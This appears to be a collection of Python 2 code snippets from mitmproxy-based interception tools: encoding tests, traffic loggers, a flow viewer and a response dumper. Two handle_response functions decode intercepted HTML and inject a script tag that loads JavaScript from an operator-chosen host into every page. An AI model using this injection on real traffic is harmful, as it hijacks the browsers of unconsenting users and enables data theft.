def test_gzip(): assert "string" == encoding.decode( "gzip", encoding.encode( "gzip", "string")) assert None == encoding.decode("gzip", "bogus")
def test_simple(self): assert "string" == encoding.decode( "deflate", encoding.encode("deflate", "string")) assert "string" == encoding.decode( "deflate", encoding.encode("deflate", "string")[2:-4]) assert None == encoding.decode("deflate", "bogus")
def test_deflate(): assert "string" == encoding.decode( "deflate", encoding.encode( "deflate", "string")) assert "string" == encoding.decode( "deflate", encoding.encode( "deflate", "string")[ 2:- 4]) assert None == encoding.decode("deflate", "bogus")
def handle_response(self, flow): hid = (flow.request.host, flow.request.port) # We only inject into html responses if flow.response.headers['Content-Type'] and str( flow.response.headers['Content-Type'][0]).startswith( 'text/html'): # Decoding of message body (zip/deflate) needed? body = flow.response.content if flow.response.headers['Content-Encoding']: body = encoding.decode( flow.response.headers['Content-Encoding'][0], flow.response.content) # We inject the js code directly before </head> injected_url = "http://" + self.options.target + self.options.path injected_code = "<script language=\"javascript\" type=\"text/javascript\" src=\"" + injected_url + "\"></script>" try: body = body.replace("</head>", injected_code + "</head>") except: pass # (Re)Encoding needed? if flow.response.headers['Content-Encoding']: body = encoding.encode( flow.response.headers['Content-Encoding'][0], body) flow.response.content = body flow.reply()
def handle_response(self, flow): url = flow.request.url method = flow.request.method content1 = flow.request.content resc = flow.response.headers.get('Content-type') reqc = flow.request.headers.get('Content-type') host = flow.request.host port = flow.request.port if lytool.filter_url(url) or self.ana2(reqc) or self.ana2( resc) or self.ana_host(host, port): pass else: host = flow.request.host port = flow.request.port url = unquote_plus(flow.request.url) path = flow.request.path scheme = flow.request.scheme method = flow.request.method httpversion = flow.request.httpversion headers1 = flow.request.headers headers2 = flow.response.headers content1 = flow.request.content content = flow.response.content gzipped = flow.response.headers.get_first("content-encoding") if gzipped: content2 = encoding.decode(gzipped, content) else: content2 = content self.db_save(host, port, url, path, method, scheme, httpversion, headers1, content1, headers2, content2) flow.reply()
def handle_response(self, flow): hid = (flow.request.host, flow.request.port) # We only inject into html responses if flow.response.headers['Content-Type'] and str(flow.response.headers['Content-Type'][0]).startswith('text/html'): # Decoding of message body (zip/deflate) needed? body = flow.response.content if flow.response.headers['Content-Encoding']: body = encoding.decode(flow.response.headers['Content-Encoding'][0],flow.response.content) # We inject the js code directly before </head> injected_url = "http://" + self.options.target + self.options.path injected_code = "<script language=\"javascript\" type=\"text/javascript\" src=\"" + injected_url + "\"></script>" try: body = body.replace("</head>", injected_code + "</head>") except: pass # (Re)Encoding needed? if flow.response.headers['Content-Encoding']: body = encoding.encode(flow.response.headers['Content-Encoding'][0], body) flow.response.content = body flow.reply()
def addFlow(self, flow): """ Adds a flow to all lists in the corresponding format """ flowRepr = flow._get_state() flowRepr["id"] = len(self._flows_serialized) #In transparent mode, we are unsure about the actual host, but we want to show it in the GUI. #Firstly, we get the Host from the request headers. #As this might be faked, we go on and check whether the request IP matches one of the DNS entries belonging to the headerHost if(True or FlowCollection.regex_isip.match(flowRepr["request"]["host"])): try: headerHost = flow.request.headers["Host"] if(headerHost): headerHost = headerHost[0] info = socket.getaddrinfo(flowRepr["request"]["host"], flowRepr["request"]["port"],0,0,socket.SOL_TCP) for i in info: if(i[4][0] == flowRepr["request"]["host"] and i[4][1] == flowRepr["request"]["port"]): flowRepr["request"]["hostFormatted"] = headerHost break except socket.gaierror: pass except: import traceback print traceback.format_exc() decoded_content = {} for i in ["request","response"]: #strip content out of the flowRepr flowRepr[i]["contentLength"] = len(flowRepr[i]["content"]) del flowRepr[i]["content"] r = getattr(flow,i) decoded = r.content #decode with http content-encoding ce = r.headers["content-encoding"] if ce and ce[0] in encoding.ENCODINGS: decoded = encoding.decode(ce[0],r.content) #decode with http content-type encoding ct = r.headers["content-type"] default_charset = "latin-1" #HTTP 1.1 says that the default charset is ISO-8859-1 charset = default_charset if ct: m = FlowCollection.regex_charset.search(ct[0]) if m: charset = m.group(1).strip('"').strip('"\'') #TODO: guess from html metadata try: decoded = decoded.decode(charset) except: try: decoded = decoded.decode(default_charset) except: print "Warning: Could not decode request." import traceback print traceback.format_exc() decoded_content[i] = decoded self._flows.append(flow) self._flows_serialized.append(flowRepr) self._decoded_contents.append(decoded_content) return len(self._flows_serialized)-1
def test_gzip(): assert "string" == encoding.decode("gzip", encoding.encode("gzip", "string")) assert None == encoding.decode("gzip", "bogus")
def add(self, flow): """ Gets called whenever a new flow has been added. """ #dumping empty flows is stupid if (len(flow.response.content) == 0): return content = flow.response.content enc = flow.response.headers.get("content-encoding") if enc and enc[0] != "identity": decoded = encoding.decode(enc[0], content) if decoded: content = decoded #get host and path host = flow.request.host if (flow.request.port != 80): host += "-" + str(flow.request.port) path = unquote( flow.request.path.split("#")[0].split("?")[0].lstrip("/\\")) if (path == ""): path = "__root__" #subdir is our relative path subdir = os.path.join(host, path) #remove invalid characters subdir = os.path.normpath(allowed_chars.sub('_', subdir)) #forbid relative directory changes. subdir = "/".join( i.lstrip(".") for i in subdir.replace("\\", "/").split("/")) subdir = "/".join(i[:20] + "[...]" + i[-20:] if (len(i) > 40) else i for i in subdir.split("/")) #cut off too long filenames MAX_DIR_LENGTH = 150 MAX_FILE_LENGTH = 50 MAX_EXT_LENGTH = 30 if (len(subdir) > MAX_DIR_LENGTH): if (subdir[MAX_DIR_LENGTH] == "/"): subdir = subdir[0:MAX_DIR_LENGTH + 1] else: subdir = subdir[0:MAX_DIR_LENGTH] subdir += "[...]" #ensure that subdir is relative, otherwise it could exploit outside of self.path #os.path.join(foo,"/bar") => "/bar" subdir = os.path.normpath("./" + subdir) filename = os.path.join(self.path, subdir) #We have the problematic situation that a both foo.com/bar #and foo.com/bar/baz can be both valid files. #However, we cannot create both a folder and a file both called "baz" in the same directory #A possible approach would be using folders for everything and placing __resource__ files in them. #While this would be a much consistent structure, it doesn't represent the file system very well. #As this view is for visualization purposes only, we took the approach to append [dir] to conflicting folders. #to accomplish this, we use a slightly modified version of os.makedirs def makedirs(directory): head, tail = os.path.split(directory) if not os.path.isdir(head): head = makedirs(head) directory = os.path.join(head, tail) if (os.path.isfile(directory) ): #our special case - rename current dir tail += "[dir]" directory = os.path.join(head, tail) return makedirs(directory) if (not os.path.isdir(directory)): os.mkdir(directory) return directory d, filename = os.path.split(filename) filename = os.path.join(makedirs(d), filename) filename, ext = os.path.splitext(filename) if (len(filename) > MAX_DIR_LENGTH + MAX_FILE_LENGTH): filename = filename[0:MAX_DIR_LENGTH + MAX_FILE_LENGTH] + "[...]" if (len(ext) >= MAX_EXT_LENGTH): ext = "[..]" + ext[-MAX_EXT_LENGTH:] appendix = "" #rename if file already exists and content is different if (os.path.isdir(filename + ext)): os.rename(filename + ext, filename + ext + "[dir]") while (os.path.isfile(filename + str(appendix) + ext)): with open(filename + str(appendix) + ext, "rb") as f: s = f.read() if (s == content): return if (appendix == ""): appendix = 1 else: appendix += 1 filename = filename + str(appendix) + ext with open(filename, 'wb') as f: f.write(str(content))
def test_simple(self): assert "string" == encoding.decode("identity", "string") assert "string" == encoding.encode("identity", "string") assert not encoding.encode("nonexistent", "string")
def addFlow(self, flow): """ Adds a flow to all lists in the corresponding format """ flowRepr = flow._get_state() flowRepr["id"] = len(self._flows_serialized) #In transparent mode, we are unsure about the actual host, but we want to show it in the GUI. #Firstly, we get the Host from the request headers. #As this might be faked, we go on and check whether the request IP matches one of the DNS entries belonging to the headerHost if (FlowCollection.regex_isip.match(flowRepr["request"]["host"])): try: headerHost = flow.request.headers["Host"] if (headerHost): headerHost = headerHost[0] info = socket.getaddrinfo(flowRepr["request"]["host"], flowRepr["request"]["port"], 0, 0, socket.SOL_TCP) for i in info: if i[4][0] == flowRepr["request"]["host"]: flowRepr["request"]["host_guess"] = headerHost break except socket.gaierror: pass except: import traceback print traceback.format_exc() #Save decoded content decoded_content = {} algorithms = ["md5", "sha1", "sha256"] for i in ["request", "response"]: #strip content out of the flowRepr flowRepr[i]["contentLength"] = len(flowRepr[i]["content"]) del flowRepr[i]["content"] r = getattr(flow, i) decoded = r.content #decode with http content-encoding try: ce = r.headers["content-encoding"] if ce and ce[0] in encoding.ENCODINGS: decoded_ = encoding.decode(ce[0], decoded) if decoded_ != None: #If the decoding fails, encoding.decode returns None. decoded = decoded_ except: print "Warning: Data cannot be decoded with given Content Encoding." #calculate hashsums flowRepr[i]["contentChecksums"] = {} parts = {"Checksum": decoded} #Handle multipart checksums if i == "request": try: headers = dict( map(str.lower, map(str, a)) for a in flow.request.headers) # odict -> (lowered) dict fs = cgi.FieldStorage(StringIO.StringIO(decoded), headers, environ={'REQUEST_METHOD': 'POST'}) parts = getParts(fs) except Exception as e: import traceback traceback.print_exc() print "Warning: Cannot decode multipart" for item, data in parts.viewitems(): checksums = {} for a in algorithms: checksums[a] = getattr(hashlib, a)(data).hexdigest() flowRepr[i]["contentChecksums"][item] = checksums #decode with http content-type encoding ct = r.headers["content-type"] default_charset = "latin-1" #HTTP 1.1 says that the default charset is ISO-8859-1 #RFC2616 3.7.1 charset = default_charset if ct: m = FlowCollection.regex_charset.search(ct[0]) if m: charset = m.group(1).strip('"').strip('"\'') #TODO: guess from html metadata try: decoded = decoded.decode(charset) except: try: decoded = decoded.decode(default_charset) except: print "Warning: Could not decode request." import traceback print traceback.format_exc() try: decoded = decoded.encode('utf-8') except: print "Warning: Cannot encode request to utf8" decoded_content[i] = decoded self._flows.append(flow) self._flows_serialized.append(flowRepr) self._decoded_contents.append(decoded_content) return len(self._flows_serialized) - 1
def test_simple(self): assert "string" == encoding.decode("gzip", encoding.encode("gzip", "string")) assert None == encoding.decode("gzip", "bogus")
def test_fallthrough(self): assert None == encoding.decode("nonexistent encoding", "string")
def addFlow(self, flow): """ Adds a flow to all lists in the corresponding format """ flowRepr = flow._get_state() flowRepr["id"] = len(self._flows_serialized) #In transparent mode, we are unsure about the actual host, but we want to show it in the GUI. #Firstly, we get the Host from the request headers. #As this might be faked, we go on and check whether the request IP matches one of the DNS entries belonging to the headerHost if(True or FlowCollection.regex_isip.match(flowRepr["request"]["host"])): try: headerHost = flow.request.headers["Host"] if(headerHost): headerHost = headerHost[0] info = socket.getaddrinfo(flowRepr["request"]["host"], flowRepr["request"]["port"],0,0,socket.SOL_TCP) for i in info: if(i[4][0] == flowRepr["request"]["host"] and i[4][1] == flowRepr["request"]["port"]): flowRepr["request"]["hostFormatted"] = headerHost break except socket.gaierror: pass except: import traceback print traceback.format_exc() #Save decoded content decoded_content = {} for i in ["request","response"]: #strip content out of the flowRepr flowRepr[i]["contentLength"] = len(flowRepr[i]["content"]) del flowRepr[i]["content"] r = getattr(flow,i) decoded = r.content #decode with http content-encoding try: ce = r.headers["content-encoding"] if ce and ce[0] in encoding.ENCODINGS: decoded = encoding.decode(ce[0],r.content) except: print "Warning: Data cannot be decoded with given Content Encoding." #decode with http content-type encoding ct = r.headers["content-type"] default_charset = "latin-1" #HTTP 1.1 says that the default charset is ISO-8859-1 #RFC2616 3.7.1 charset = default_charset if ct: m = FlowCollection.regex_charset.search(ct[0]) if m: charset = m.group(1).strip('"').strip('"\'') #TODO: guess from html metadata try: decoded = decoded.decode(charset) except: try: decoded = decoded.decode(default_charset) except: print "Warning: Could not decode request." import traceback print traceback.format_exc() try: decoded = decoded.encode('utf-8') except: print "Warning: Cannot encode request to utf8" decoded_content[i] = decoded #calculate hashsums algorithms = ["md5","sha256"] for i in ["request","response"]: flowRepr[i]["contentChecksums"] = {} parts = {"Checksum":decoded_content[i]} #Handle multipart checksums if i == "request": try: headers = dict(map(str.lower, map(str,a)) for a in flow.request.headers) # odict -> (lowered) dict fs = cgi.FieldStorage(StringIO.StringIO(decoded_content[i]),headers,environ={ 'REQUEST_METHOD':'POST' }) parts = getParts(fs) except Exception as e: import traceback traceback.print_exc() print "Warning: Cannot decode multipart" #TODO: Analyze request and split it up into parameters to match file upload for item, data in parts.viewitems(): checksums = {} for a in algorithms: checksums[a] = getattr(hashlib,a)(data).hexdigest() flowRepr[i]["contentChecksums"][item] = checksums self._flows.append(flow) self._flows_serialized.append(flowRepr) self._decoded_contents.append(decoded_content) return len(self._flows_serialized)-1
def test_identity(): assert "string" == encoding.decode("identity", "string") assert "string" == encoding.encode("identity", "string") assert not encoding.encode("nonexistent", "string") assert None == encoding.decode("nonexistent encoding", "string")
def add(self, flow): """ Gets called whenever a new flow has been added. """ #dumping empty flows is stupid if(len(flow.response.content) == 0): return #FIXME: What about content type charset? content = flow.response.content enc = flow.response.headers.get("content-encoding") if enc and enc[0] != "identity": decoded = encoding.decode(enc[0], content) if decoded: content = decoded #get host and path host = flow.request.host if(flow.request.port != 80): host += "-"+str(flow.request.port) path = flow.request.path.split("#")[0].split("?")[0].lstrip("/\\") if(path == ""): path = "__root__" #subdir is our relative path subdir = os.path.join(host,path) #forbid relative directory changes. subdir = "/".join(i.lstrip(".") for i in subdir.replace("\\","/").split("/")) subdir = "/".join(i[:20]+"[...]"+i[-20:] if (len(i) > 40) else i for i in subdir.split("/")) #remove invalid characters subdir = os.path.normpath("".join(i for i in subdir if i not in r':*?"<>|')) #cut off too long filenames MAX_DIR_LENGTH = 150 MAX_FILE_LENGTH = 50 MAX_EXT_LENGTH = 30 if(len(subdir) > MAX_DIR_LENGTH): if(subdir[MAX_DIR_LENGTH] == "/"): subdir = subdir[0:MAX_DIR_LENGTH+1] else: subdir = subdir[0:MAX_DIR_LENGTH] subdir += "[...]" #ensure that subdir is relative, otherwise it could exploit outside of self.path #os.path.join(foo,"/bar") => "/bar" subdir = os.path.normpath("./"+subdir) filename = os.path.join(self.path,subdir) #We have the problematic situation that a both foo.com/bar #and foo.com/bar/baz can be both valid files. #However, we cannot create both a folder and a file both called "baz" in the same directory #A possible approach would be using folders for everything and placing __resource__ files in them. #While this would be a much consistent structure, it doesn't represent the file system very well. #As this view is for visualization purposes only, we took the approach to append [dir] to conflicting folders. #to accomplish this, we use a slightly modified version of os.makedirs def makedirs(directory): head,tail = os.path.split(directory) if not os.path.isdir(head): head = makedirs(head) directory = os.path.join(head,tail) if(os.path.isfile(directory)): #our special case - rename current dir tail += "[dir]" directory = os.path.join(head,tail) return makedirs(directory) if(not os.path.isdir(directory)): os.mkdir(directory) return directory d, filename = os.path.split(filename) filename = os.path.join(makedirs(d),filename) filename, ext = os.path.splitext(filename) if(len(filename) > MAX_DIR_LENGTH+MAX_FILE_LENGTH): filename = filename[0:MAX_DIR_LENGTH+MAX_FILE_LENGTH]+"[...]" if(len(ext) >= MAX_EXT_LENGTH): ext = "[..]" + ext[-MAX_EXT_LENGTH:] appendix = "" #rename if file already exists and content is different if(os.path.isdir(filename+ext)): os.rename(filename+ext, filename+ext+"[dir]") while(os.path.isfile(filename+str(appendix)+ext)): with open(filename+str(appendix)+ext) as f: s = f.read() if(s == content): return if(appendix == ""): appendix = 1 else: appendix += 1 filename = filename + str(appendix) + ext with open(filename, 'wb') as f: f.write(str(content))